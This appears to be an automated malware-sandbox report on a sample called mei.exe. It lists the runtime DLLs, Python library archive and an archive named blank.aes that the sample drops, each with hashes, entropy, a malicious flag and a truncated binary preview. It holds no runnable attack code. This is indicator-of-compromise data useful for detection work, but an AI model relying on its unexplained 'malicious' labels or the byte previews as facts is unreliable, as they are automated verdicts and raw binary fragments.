                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):22920
                                                                                                                                                                    Entropy (8bit):5.131823590048643
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:5gdKIMFqumaRWyhWuUSwv7s8jtGBIYiYF8oDbnPZ2oEhZnpH3GCwgEfGydk7MGSM:mW7RWyhWuU8JIYiaHZ8ZpH3GCJEOyAp
                                                                                                                                                                    MD5:6190D736DC05C36AAE091C853933C690
                                                                                                                                                                    SHA1:6D93EE8D3F60EC65AD8418FA99A90B71A4FC0B29
                                                                                                                                                                    SHA-256:968CC240FCCFC3EA067E7C9B89C002ECEE9844573C06923B490BBDB644DAC098
                                                                                                                                                                    SHA-512:99C7A8B91A6355F95629F5D04A3B90D337274EE66C7C768C5955D512EFA3402B94F39F84B9F9D3F6937F5906156A62CE77A1113D736744C0AC5A9D5C8144FA39
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....f..........." .........0...............................................@......Bd....`A........................................p...H............0...............0...)..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-timezone-l1-1-0.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):22920
                                                                                                                                                                    Entropy (8bit):5.079755435915652
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:DN9WyhWaUSwv7s8jtGBIYiYF8oDbnPZ2oEhZnpH3GCwgEfPyNtgGRDe:DrWyhWaU8JIYiaHZ8ZpH3GCJEnyFRDe
                                                                                                                                                                    MD5:80BD4ECD52C736047B21F0C4C6BDAA95
                                                                                                                                                                    SHA1:8AC491285818F19485351253129889839D97AEDF
                                                                                                                                                                    SHA-256:04F932559F3E5EEC0D929D60AB501FC0F6037E97B241E2B3DDD3AD16FEDAA23C
                                                                                                                                                                    SHA-512:3F79A2C1635EEC05C7A9E561842E2BED227D1D3DB72B6CC34E121BFEB29755D51DB707BEE955A1D1E24E4FAEA8EF8426283B8C0820A528001851600AB20CF7E3
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...>.os.........." .........0...............................................@.......>....`A........................................p...H............0...............0...)..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-util-l1-1-0.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):22920
                                                                                                                                                                    Entropy (8bit):4.870336218277447
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:/WyhWqUSwv7s8jtGBIYiYF8oDbnPZ2oEhZnpH3GCwgEfAuyWN58:/WyhWqU8JIYiaHZ8ZpH3GCJEYuyWN58
                                                                                                                                                                    MD5:33C011AD262BD8A5F1DA323BEAC000E6
                                                                                                                                                                    SHA1:4EC9D57CC31BFE16EB437F8C9801D4150F4E3359
                                                                                                                                                                    SHA-256:20F67E47FBCB86FED54052BCFF354B6049FC4AF4F33F6E0DEE254A8DC75F7106
                                                                                                                                                                    SHA-512:ACEAE833AABD3ED2CFDE729B27CC939142731A3E29687492F2139814C18DCFE792222920B1D00C326CA64A8344D62FAD1A292D4AA3519A66C365636013C69896
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....+..........." .........0...............................................@............`A........................................p...<............0...............0...)..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-conio-l1-1-0.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):22920
                                                                                                                                                                    Entropy (8bit):5.16652442843799
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:kvYWyhWyUSwv7s8jtGBIYiYF8oDbnPZ2oEhZnpH3GCwgEfQUylK8UJqEIzp:TWyhWyU8JIYiaHZ8ZpH3GCJEJywM
                                                                                                                                                                    MD5:5D36EEC3032C57577B1529F6D3A80770
                                                                                                                                                                    SHA1:DE13734894CB1F0AF00CB6699C1B1C6527632C79
                                                                                                                                                                    SHA-256:019C530AE81BE718735A3462DD7546E2601E395DA27BBD680E51CC65EA273CA0
                                                                                                                                                                    SHA-512:381752A0FBEE114CE0A315605C076451BAFF9E4EF1091D0597C795EBE8F0320068CE07160715BDBB91D89EBEC4DCB9D40CDECEEF25FC1B0DA68223AFB8AB93D7
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...Aj............" .........0...............................................@......G.....`A.........................................................0...............0...)..............p............................................................................rdata..p...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-convert-l1-1-0.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):27016
                                                                                                                                                                    Entropy (8bit):5.100260968101632
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:EyNWyhWhU8JIYiaHZ8ZpH3GCJELye5nPKH:vtYiQZiRBELX5y
                                                                                                                                                                    MD5:F798346A30837250E87373815B0919FF
                                                                                                                                                                    SHA1:A6644B273E9500C294CA69946014B678B6D97BB5
                                                                                                                                                                    SHA-256:B9E79B0A43738078C13034A62E4472DA8A5B2E44894F29FE3464702ECDA3C8D4
                                                                                                                                                                    SHA-512:8D4D6A90E4C19A919955E8D0084B0ABD5BB2CCE1B97F80773F970B5650D7DDFEDD025129D066771ECD9D07B26BC2FEA1373D130F935D191D9594D589ED98AB8A
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...U.gJ.........." .........@...............................................P............`A.........................................................@...............@...)..............p............................................................................rdata..n........ ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-environment-l1-1-0.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):22920
                                                                                                                                                                    Entropy (8bit):4.990768293397843
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:gWyhW0USwv7s8jtGBIYiYF8oDbnPZ2oEhZnpH3GCwgEfkyOhRn:gWyhW0U8JIYiaHZ8ZpH3GCJEcyOhRn
                                                                                                                                                                    MD5:FA453AA56810FAB9B13550A8D8341B12
                                                                                                                                                                    SHA1:B1576E36958DEFB6FDBAECD4DE7E7C1321A98F6E
                                                                                                                                                                    SHA-256:29DB38F7A980F74934D17F7BA9DD8DF503678C5787DC1A94C0EF057DEDFC2CEF
                                                                                                                                                                    SHA-512:393578FB5747AE679EB8613321C4546F4F9904CCB7FC3CAAE46636484015B442CBF49D8BF697AC2F64E969F9B396823B7B13349E6B4960DF9F06A7376E6B5775
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...9.4o.........." .........0...............................................@......~.....`A............................................"............0...............0...)..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-filesystem-l1-1-0.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):22920
                                                                                                                                                                    Entropy (8bit):5.437373746086115
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:HptnWm5CVWyhW+U8JIYiaHZ8ZpH3GCJEW0yPFIwbD:HptnWm5C/kYiQZiRBERCFND
                                                                                                                                                                    MD5:65D46C48252F9F51685C3ED011A9884B
                                                                                                                                                                    SHA1:024FB899C57EF679DDF2764AAD8DF65A5C026688
                                                                                                                                                                    SHA-256:FC59E7A7CBC98AA47655DF33728919A4C14FAF593368AD21E5E1FB0F09CB6CCE
                                                                                                                                                                    SHA-512:CC50A779961DB8444B5AD9E45A378FC66D84F64CC5E3E6D31537542998C37B3E440A9585803159A1EA4390D2CFE29F314096F9496527575846944BA5CEC53E48
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...2............." .........0...............................................@............`A.........................................................0...............0...)..............p............................................................................rdata..0...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-heap-l1-1-0.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):22920
                                                                                                                                                                    Entropy (8bit):5.115545906419277
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:lLNWyhWoU8JIYiaHZ8ZpH3GCJEmyh3AN4G:lHiYiQZiRBEmael
                                                                                                                                                                    MD5:D6C812262A9F85E4766B1CBF7E5B805B
                                                                                                                                                                    SHA1:307608CCBBBAB4CBB08867CA9E67993598ADADA3
                                                                                                                                                                    SHA-256:D3C96F9DFE7A3B1F22B6A6AB11779E8A42E77D986B331CAEFA1435FDBAA2C358
                                                                                                                                                                    SHA-512:3D394D2F4C637E12B092BD2A6FFF6D0233ABCDFC3E609DD30600D99B2582F7C12D15AF6D4D46733E639DB0ECC57F21D55CE08ED47FEC2E1E48CFB0B6C7A36BC2
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...."]..........." .........0...............................................@......9(....`A.........................................................0...............0...)..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-locale-l1-1-0.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):22920
                                                                                                                                                                    Entropy (8bit):5.076064551255853
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:UWyhWjOU8JIYiaHZ8ZpH3GCJEvyFD9n0q:kYYiQZiRBEvCD90q
                                                                                                                                                                    MD5:7743661702EF760FA8E5D41E32FD8D1F
                                                                                                                                                                    SHA1:5D364CC2BD3E301ED62B9068C23D1D8A0103E052
                                                                                                                                                                    SHA-256:4CB91250129F9E90E89F0EB429387BA4896789B18BE4A47BFBE94EAE64976D74
                                                                                                                                                                    SHA-512:D6AEDA9CD5E0C3B7AD3E658EF3D8381EC506B5CCCDB6476F25B79BEC27FD283A680F711DE2EB01449DCA0C36C7770707F1A2F3C8D2B184E78A924214DDD559BA
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...6..q.........." .........0...............................................@............`A............................................e............0...............0...)..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-math-l1-1-0.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):31112
                                                                                                                                                                    Entropy (8bit):5.3249825040949625
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:P7yaFM4Oe59Ckb1hgmL5WyhWSU8JIYiaHZ8ZpH3GCJEYDy9X5:jFMq59Bb1jrYYiQZiRBEYDgJ
                                                                                                                                                                    MD5:D9A8DDA1433C0C990475D7927A0B57DE
                                                                                                                                                                    SHA1:C79BC530CD6273275C9641EB7147743BFB410A5F
                                                                                                                                                                    SHA-256:0160BBF3762F1116DFC039162CD94B82FCF61BCDAAC9E8161FBE763E68EBF489
                                                                                                                                                                    SHA-512:056190EDBCA8BE91C0AE7C8BC1B07E38A3FF906033DD42B863A424AED23D136A8D9A63BB33FAF6986D1C6560D4D52A14EDE4697AE75BBB2BF5A336936606B5E9
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d................" .........P...............................................`............`A.............................................%...........P...............P...)..............p............................................................................rdata...'.......0..................@..@.data........@......................@....rsrc........P.......@..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-process-l1-1-0.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):22920
                                                                                                                                                                    Entropy (8bit):5.1300184563064715
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:IeXrqjd7tWyhW/gUSwv7s8jtGBIYiYF8oDbnPZ2oEhZnpH3GCwgEfFy0G1FwGj:I4rcWyhW4U8JIYiaHZ8ZpH3GCJEdy0GH
                                                                                                                                                                    MD5:D59D798EFEB82583664573B4C275940D
                                                                                                                                                                    SHA1:CA9650245C27AB3B795CCC21EE5B5FB948FD16CC
                                                                                                                                                                    SHA-256:859A0F16A6B01AF35F4ECCAA4CE383C98DFDFC9D9903EC2F35BA5CDE44983924
                                                                                                                                                                    SHA-512:9135539A869C0FDD0591F4D51DB37017A086277A9D9BB47C4B08827A7030B5DCA48103D8C9751D279FC657F53FB80BD205C83C97883FB2D45150288FDA6843F4
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...<SdT.........." .........0...............................................@......'.....`A............................................x............0...............0...)..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-runtime-l1-1-0.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):27016
                                                                                                                                                                    Entropy (8bit):5.237414281586572
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:7ysyr7/WyhWZU8JIYiaHZ8ZpH3GCJEZyTqeBKiV8n:e3r7NlYiQZiRBEZVqGn
                                                                                                                                                                    MD5:98403AB797B6FB1085406D0880C58669
                                                                                                                                                                    SHA1:991731FF971D87DC7FACBBFE4EF275FBC2EB28AC
                                                                                                                                                                    SHA-256:43DAB57BBE95B15272261849E3285B2359394DE2A4C2A5B0B44834D35125764A
                                                                                                                                                                    SHA-512:2005122AB469F866761CCE8B61078C39F718947EBC51FCEE5AC33DF43C97F7BAB37A7943F30535FDEA6C310A22BA2D6270BAFE30FDDE4A7A22C71713615C96A6
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....TR.........." .........@...............................................P............`A............................................4............@...............@...)..............p............................................................................rdata........... ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-stdio-l1-1-0.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):27016
                                                                                                                                                                    Entropy (8bit):5.498827388028231
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:rV2oFVhzWyhWEU8JIYiaHZ8ZpH3GCJEdyZZqj:rZ/WYiQZiRBEd0A
                                                                                                                                                                    MD5:7B7F4EAB1E000B458D3A8D9D82208B16
                                                                                                                                                                    SHA1:3CE4A5179C26317D31B27FB1F9A88CB3C11DA56D
                                                                                                                                                                    SHA-256:0FAB6F7DD517D084A05CF39D63C21B047148A82A5C884A62A04FAFF8AF3E8DCC
                                                                                                                                                                    SHA-512:CAC0097BDD0B285E2DDC1018B53639C44748C7371DE3919D2B8F0AA78C8A71B9D943E4A4084F70AD83D72FD52816F8206211A0C0F237C2E5BA29963A46EA17B8
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...k. U.........." .........@...............................................P......`.....`A............................................a............@...............@...)..............p............................................................................rdata........... ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-string-l1-1-0.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):27016
                                                                                                                                                                    Entropy (8bit):5.488027299169383
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:uCV5yguNvZ5VQgx3SbwA71IkFyIYiQZiRBEyY/Stk:J5yguNvZ5VQgx3SbwA71IxI7ciDi/Stk
                                                                                                                                                                    MD5:66082DD6787E553A840310C8F8B0E4A8
                                                                                                                                                                    SHA1:56EA74E25BE107C51E01BB1023B8F3A708D913FA
                                                                                                                                                                    SHA-256:047EF4E4A2A8991CFE3C443F068F8184D2A0A18DFD0545300CF46B93E8886113
                                                                                                                                                                    SHA-512:0977F76658FD38A3487BA7B444189FD4AEDC20CAC4729CD13A03D86B4B252F347476CE4A3152F54BE3C2FAA8D60AE2AD3B0572899F569DA6612E9A3C7FF72DAA
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.... .h.........." .........@...............................................P............`A.........................................................@...............@...)..............p............................................................................rdata.._........ ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-time-l1-1-0.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):22920
                                                                                                                                                                    Entropy (8bit):5.480527288691285
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:m43hwDyWyhWLUSwv7s8jtGBIYiYF8oDbnPZ2oEhZnpH3GCwgEfhTycy7abKp/0y:JWyhWLU8JIYiaHZ8ZpH3GCJEZy/7MKh
                                                                                                                                                                    MD5:44B22D07687C5241B8F4D0E51B7C04B4
                                                                                                                                                                    SHA1:4CEA2309F61ED3FC73B782259EA3BDCA4264F935
                                                                                                                                                                    SHA-256:27961196048277AD6836DFD80307CE1334BC921D661C35576BC86858DC24CDF4
                                                                                                                                                                    SHA-512:50689E4361457779A7CAEFCB85C8193065C81CC5959FDDDCE175F41CA777931C7591AD01D714EBDCF8FAB8622F2A8F53F51FDB5FB028992CB6D30FEA8D39F580
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...G............" .........0...............................................@............`A.........................................................0...............0...)..............p............................................................................rdata..=...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-crt-utility-l1-1-0.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):22920
                                                                                                                                                                    Entropy (8bit):5.059390570888982
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:F/fHQduHWyhWRUSwv7s8jtGBIYiYF8oDbnPZ2oEhZnpH3GCwgEf5yvTKC:F/fRWyhWRU8JIYiaHZ8ZpH3GCJEByeC
                                                                                                                                                                    MD5:CBB06D1DC02E5EC16771EDB3E6E42890
                                                                                                                                                                    SHA1:952711529980A8F4A01F79849E4A6E57A0AA098A
                                                                                                                                                                    SHA-256:38B77CD742DA9542B3527D71C35A8E44991A17F6222C85A2E9EFCA9E5E477787
                                                                                                                                                                    SHA-512:399D8DC46E78CA25FFADF1D7270C7C63B28CA98FC27ACCDA152608DF1A23343D6CE844B3A284B93EF0BE64BC736A4B6239805EF4DBFE5675E30CEC7AE33B7BAE
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...2............." .........0...............................................@......'.....`A............................................^............0...............0...)..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\base_library.zip

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1440734
                                                                                                                                                                    Entropy (8bit):5.590383253842785
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:mQR5pATG8/R5lUKdcubgAnyfb8h30iwhBdYf9PfeYHHc:mQR5pE/RbPu
                                                                                                                                                                    MD5:D220B7E359810266FE6885A169448FA0
                                                                                                                                                                    SHA1:556728B326318B992B0DEF059ECA239EB14BA198
                                                                                                                                                                    SHA-256:CA40732F885379489D75A2DEC8EB68A7CCE024F7302DD86D63F075E2745A1E7D
                                                                                                                                                                    SHA-512:8F802C2E717B0CB47C3EEEA990FFA0214F17D00C79CE65A0C0824A4F095BDE9A3D9D85EFB38F8F2535E703476CB6F379195565761A0B1D738D045D7BB2C0B542
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:PK..........!.h%..b...b......._collections_abc.pyc............................................d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.........................Z...e.d...............Z.d...Z...e.e...............Z.[.g.d...Z.d.Z...e...e.d.............................Z...e...e...e...........................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.g.............................Z...e...e...e.g...........................................Z...e...e...e.d...........................................Z...e...e...e.d.d.z.............................................Z...e...e...e...........................................Z...e...e.d.............................Z ..e...e.d.............................Z!..e...e...e"..........................................Z#..e.i.......................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\blank.aes

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):124579
                                                                                                                                                                    Entropy (8bit):7.606926497803956
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:4YpNNk2TdLmflt6e7YlrfvC+M3sKI2mJiKdV0HU6Q:hHdKfT69XCx3sKI2mJCU6Q
                                                                                                                                                                    MD5:07101800E0EE631A87738C9F9F81A1D5
                                                                                                                                                                    SHA1:0E837535C7768D748BC04A13A9EC397C48D7AE4F
                                                                                                                                                                    SHA-256:FAE8C9B6B5F67E9CD3496019DA6E0ED28442FD799354F9575ADD41599C4DFCBF
                                                                                                                                                                    SHA-512:6B4A96E6981C591EE83D2842C69D820DF90D83EC3A10F28F73BD0D4AF55297FE56DC2E27426378F5879CFCCF476E02F32F56CD1CD324E00B2561DEE0F5AC1F30
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:PK........7C.W..g-...-.......stub-o.pyc........Z.ne..........................j.......e.....e...e...e.g.d.....................................................................e.g.d.....................................................................e.g.d.................................................................................Z...e.....e...e...e.g.d.....................................................................e.g.d.....................................................................e.g.d.................................................................................Z...e.....e...e...e.g.d.....................................................................e.g.d.....................................................................e.g.d.................................................................................Z...e.....e...e...e.g.d.....................................................................e.g.d.................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI74682\libcrypto-3.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1629464
                                                                                                                                                                    Entropy (8bit):7.952620301087112
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:AMyDwbv70aKbP1zkLO5YHLA1CPwDvt3uFlDCZ:kwbv77KbPaqYHLA1CPwDvt3uFlDCZ
                                                                                                                                                                    MD5:27515B5BB912701ABB4DFAD186B1DA1F
                                                                                                                                                                    SHA1:3FCC7E9C909B8D46A2566FB3B1405A1C1E54D411
                                                                                                                                                                    SHA-256:FE80BD2568F8628032921FE7107BD611257FF64C679C6386EF24BA25271B348A
                                                                                                                                                                    SHA-512:087DFDEDE2A2E6EDB3131F4FDE2C4DF25161BEE9578247CE5EC2BCE03E17834898EB8D18D1C694E4A8C5554AD41392D957E750239D3684A51A19993D3F32613C
                                                                                                                                                                    Malicious:true
